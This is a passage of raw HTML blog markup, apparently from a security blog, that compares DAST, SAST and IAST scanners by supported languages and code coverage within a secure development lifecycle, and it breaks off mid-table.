&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IXyUg4TQNUAQOtby509QW7F656KMi8T6xNqJ0vmqgTuo92EZDy1UuEms8QgQ8AiYnyRSzwva5eGe8gwBL7KRw1vSJ9Mz4MKG1lW2WL2QiHA7brSAmyaacLxT0VMTjM0rQyTzIHXgGfk/s1600/OpenSourceScanners.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;150&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi8IXyUg4TQNUAQOtby509QW7F656KMi8T6xNqJ0vmqgTuo92EZDy1UuEms8QgQ8AiYnyRSzwva5eGe8gwBL7KRw1vSJ9Mz4MKG1lW2WL2QiHA7brSAmyaacLxT0VMTjM0rQyTzIHXgGfk/s640/OpenSourceScanners.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;*) &lt;/b&gt;The various aspects of hybrid analysis tools are &lt;b&gt;NOT &lt;/b&gt;covered in the various article sections and charts, and the same goes for network vulnerability scanners with application level features but without SSDLC adaptation, or cloud security solutions without SSDLC integrations.&lt;br /&gt;
&lt;br /&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
So Which Solution Category Is Most Important in SSDLC?&lt;/h3&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot;&gt;
&lt;h3 style=&quot;text-align: left;&quot;&gt;
&lt;b&gt;&lt;u&gt;&lt;span style=&quot;font-size: large;&quot;&gt;Technology Support vs. Code/Application Coverage&lt;/span&gt;&lt;/u&gt;&lt;/b&gt;&lt;/h3&gt;
&lt;h3 style=&quot;text-align: center;&quot;&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;div style=&quot;font-size: medium; text-align: left;&quot;&gt;
&lt;div style=&quot;font-size: medium;&quot;&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;The most obvious differentiation between the various scanning solution categories is the amount of supported technologies - as in - which development languages are supported.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;After comparing the various official and unoffical supported technologies proclaimed at the various vendor data-sheets, we&#39;ll quickly get to the following conclusion:&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;IAST &lt;span style=&quot;font-weight: normal;&quot;&gt;solutions typically support only a handful of development technologies (&lt;/span&gt;2017 stats&lt;span style=&quot;font-weight: normal;&quot;&gt;), SAST solutions can support a myrid of modern and legacy programming languages, and DAST solutions are rarely affected by the development technology -&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style=&quot;text-align: center;&quot;&gt;
&lt;span style=&quot;color: cyan; font-size: small;&quot;&gt;Click to Enlarge&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal; text-align: left;&quot;&gt;
&lt;div class=&quot;separator&quot; style=&quot;clear: both; text-align: center;&quot;&gt;
&lt;a href=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht3SIOem3Ly824aVXL8xVlCluUndL-9QuTiZMvB2HmXpch2y85lMou7ZBFka3ESb4TPTxBzi0aJCaOHxo6bwH_ONasQBVpEmMSM7BwfMkAUYCtD3W3d8iQnY2v-F8rvx3mb86PoUNfkv4/s1600/Supported-Techonologies-DAST-SAST-IAST.png&quot; imageanchor=&quot;1&quot; style=&quot;margin-left: 1em; margin-right: 1em;&quot;&gt;&lt;img border=&quot;0&quot; height=&quot;360&quot; src=&quot;https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEht3SIOem3Ly824aVXL8xVlCluUndL-9QuTiZMvB2HmXpch2y85lMou7ZBFka3ESb4TPTxBzi0aJCaOHxo6bwH_ONasQBVpEmMSM7BwfMkAUYCtD3W3d8iQnY2v-F8rvx3mb86PoUNfkv4/s640/Supported-Techonologies-DAST-SAST-IAST.png&quot; width=&quot;640&quot; /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-size: medium; font-weight: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; font-size: medium; font-weight: normal; width: 582px;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #525252; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 39.85pt;&quot; valign=&quot;top&quot; width=&quot;53&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
#&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #525252; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 396.4pt;&quot; valign=&quot;top&quot; width=&quot;529&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
Supported Technologies&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 39.85pt;&quot; valign=&quot;top&quot; width=&quot;53&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
DAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 396.4pt;&quot; valign=&quot;top&quot; width=&quot;529&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt; text-align: left;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;u style=&quot;font-weight: bold; text-align: center;&quot;&gt;Any&lt;/u&gt;&lt;span style=&quot;font-weight: bold; text-align: center;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;application with&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;font-weight: bold; text-align: center;&quot;&gt;WEB&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;/&lt;/span&gt;&lt;span style=&quot;font-weight: bold; text-align: center;&quot;&gt;REST&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;/&lt;/span&gt;&lt;span style=&quot;font-weight: bold; text-align: center;&quot;&gt;WebService&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;back-end.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: 0.0001pt; text-align: left;&quot;&gt;
Some exotic back-end&amp;nbsp;listeners may be supported as well (web-sockets, DWR, AMF, etc).&lt;/div&gt;
The support also depends on compatibility with &lt;b&gt;input delivery vectors,&lt;/b&gt; as well as &lt;b&gt;compatible crawling &lt;/b&gt;OR &lt;b&gt;session recording features&lt;/b&gt;.&lt;span style=&quot;font-weight: normal; text-align: center;&quot;&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp;&lt;/span&gt;&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 39.85pt;&quot; valign=&quot;top&quot; width=&quot;53&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
SAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 396.4pt;&quot; valign=&quot;top&quot; width=&quot;529&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;text-align: center;&quot;&gt;Java, ASP.Net, C#.Net,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;VB.Net,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;PHP, Noje.js, Html/JS,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;SQL,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;Ruby, Pyhon, C, C++, JSP, ASP3,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;VB6,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;&amp;nbsp;VBScript,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;Groovy,&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;&amp;nbsp;Scala, Perl, Apex, VisualForce,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;Android/iOS/WinMobile, Objective C, Swift, PhoneGap,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;Flex ActionScript, COBOL,&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;ABAP, Coldfusion CFML&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 39.85pt;&quot; valign=&quot;top&quot; width=&quot;53&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 396.4pt;&quot; valign=&quot;top&quot; width=&quot;529&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;text-align: center;&quot;&gt;Java, .Net, PHP&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;(few vendors)&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;, Node.js&amp;nbsp;&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;(few vendors)&lt;/span&gt;&lt;span style=&quot;text-align: center;&quot;&gt;, Ruby (few vendors), Python (experimental)&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;font-size: medium; font-weight: normal;&quot;&gt;
&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;text-align: left;&quot;&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;* data gathered from the proclaimed/documented features of the vast majority of existing products (May 2017)&lt;/span&gt;&lt;br /&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal; text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;The charts and tables signify the result of high end DAST/SAST/IAST in the industry, and obviously, some SAST and IAST solutions may support a much lower subset of technologies than the listed scope. Comparing the support for scanning non-web application variants (custom non-HTTP-based protocols) will drastically affect the chart as well.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; font-weight: normal; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;It is also important to mention that DAST/Active IAST solutions in automated modes also need to be able to &quot;crawl&quot; the technology, or at the very least support the creation of recorded &quot;sessions&quot; of a manual crawling process, and also support sending attack payloads through the &quot;input delivery vectors&quot; used by the application (e.g. query-string / body / JSON/ XML / AMF / etc).&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;Although SAST / Passive IAST solutions also need to support &quot;tracking&quot; the input delivery vectors, they could, theoretically, identify hazardous code patterns without tracking the entire input-output flow, with the price of potential false positives being reported.&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;The difference in technology support in IAST solutions is partially related to the fact that IAST implementations are &lt;/span&gt;relatively new &lt;span style=&quot;font-weight: normal;&quot;&gt;compared to DAST or SAST implementations, but also to the amount of effort required to &quot;integrate&quot; the IAST engine to each new technology, and furthermore, to maintain the implementation with the release of newer versions of the same supported technologies (adaptations may be required for major java JVM versions, newer .net framework versions, etc).&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;So, although this technology-support &quot;&lt;/span&gt;GAP&lt;span style=&quot;font-weight: normal;&quot;&gt;&quot; may be smaller over time, the effort that will be required to maintain technology support will grow at a bigger pace, at least when compared to the pace of DAST and SAST technology compliance.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-weight: normal;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;It is however, worth mentioning that most IAST vendors focus on &lt;/span&gt;widely used&lt;span style=&quot;font-weight: normal;&quot;&gt;&amp;nbsp;technologies that would cover as much ground as possible (Java / .Net / PHP / Node.js), and thus the actual importance of &lt;/span&gt;this &quot;gap&quot;&lt;span style=&quot;font-weight: normal;&quot;&gt; will greatly vary for some organizations, and &lt;/span&gt;may even be insignificant for &lt;u&gt;some&lt;/u&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: large; font-weight: normal;&quot;&gt;And what of coverage ?&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;font-size: medium; text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;As it appears, being able to &quot;support&quot; a technology, does not necessarily&amp;nbsp;allow the testing tool to automatically cover the larger portion of it&#39;s scope, which in turn, may dramatically affect the results.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align: start;&quot;&gt;
&lt;div style=&quot;text-align: left;&quot;&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;The type of technologies evaluated, the method of evaluation, the code deployment format, and even the &quot;legal&quot; ownership of the source code libraries may affect the actual sections being covered by the tool.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style=&quot;font-size: small;&quot;&gt;&lt;span style=&quot;font-weight: normal;&quot;&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style=&quot;font-size: x-small;&quot;&gt;&lt;span style=&quot;font-size: small; font-weight: normal;&quot;&gt;The coverage criteria will be easier to understand in the form of a table, rather than a chart:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table border=&quot;1&quot; cellpadding=&quot;0&quot; cellspacing=&quot;0&quot; class=&quot;MsoTableGrid&quot; style=&quot;border-collapse: collapse; border: none; mso-border-alt: solid windowtext .5pt; mso-padding-alt: 0in 5.4pt 0in 5.4pt; mso-yfti-tbllook: 1184;&quot;&gt;
 &lt;tbody&gt;
&lt;tr&gt;
  &lt;td style=&quot;background: #525252; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 130.85pt;&quot; valign=&quot;top&quot; width=&quot;174&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
Coverage&lt;b&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #525252; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 80.4pt;&quot; valign=&quot;top&quot; width=&quot;107&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;DAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #525252; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 76.5pt;&quot; valign=&quot;top&quot; width=&quot;102&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;SAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #525252; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.0in;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;Passive-IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;background: #525252; border-left: none; border: solid windowtext 1.0pt; mso-background-themecolor: accent3; mso-background-themeshade: 128; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 71.75pt;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;Active-IAST&lt;o:p&gt;&lt;/o:p&gt;&lt;/b&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 130.85pt;&quot; valign=&quot;top&quot; width=&quot;174&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;Out-Of-The-Box &lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
Wide Coverage Min Effort&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 80.4pt;&quot; valign=&quot;top&quot; width=&quot;107&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Unauthenticated/
  Form/Basic/NTLM &lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 76.5pt;&quot; valign=&quot;top&quot; width=&quot;102&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: #00b050; font-family: &amp;quot;wingdings&amp;quot;;&quot;&gt;✔&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Most
  Scenarios&lt;/span&gt;&lt;o:p&gt;&lt;/o:p&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 1.0in;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;b&gt;&lt;span style=&quot;color: #00b0f0; font-size: 16.0pt;&quot;&gt;?&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;In Tested/Used
  Instances&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
  &lt;td style=&quot;border-bottom: solid windowtext 1.0pt; border-left: none; border-right: solid windowtext 1.0pt; border-top: none; mso-border-alt: solid windowtext .5pt; mso-border-left-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 71.75pt;&quot; valign=&quot;top&quot; width=&quot;96&quot;&gt;&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;color: red;&quot;&gt;&lt;span style=&quot;font-family: inherit;&quot;&gt;X&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div align=&quot;center&quot; class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in; text-align: center;&quot;&gt;
&lt;span style=&quot;font-size: 8.0pt;&quot;&gt;Depending
  on Implementation&lt;o:p&gt;&lt;/o:p&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/td&gt;
 &lt;/tr&gt;
&lt;tr&gt;
  &lt;td style=&quot;border-top: none; border: solid windowtext 1.0pt; mso-border-alt: solid windowtext .5pt; mso-border-top-alt: solid windowtext .5pt; padding: 0in 5.4pt 0in 5.4pt; width: 130.85pt;&quot; valign=&quot;top&quot; width=&quot;174&quot;&gt;&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
&lt;b&gt;&lt;u&gt;End-To-End Coverage&lt;o:p&gt;&lt;/o:p&gt;&lt;/u&gt;&lt;/b&gt;&lt;/div&gt;
&lt;div class=&quot;MsoNormal&quot; style=&quot;line-height: normal; margin-bottom: .0001pt; margin-bottom: 0in;&quot;&gt;
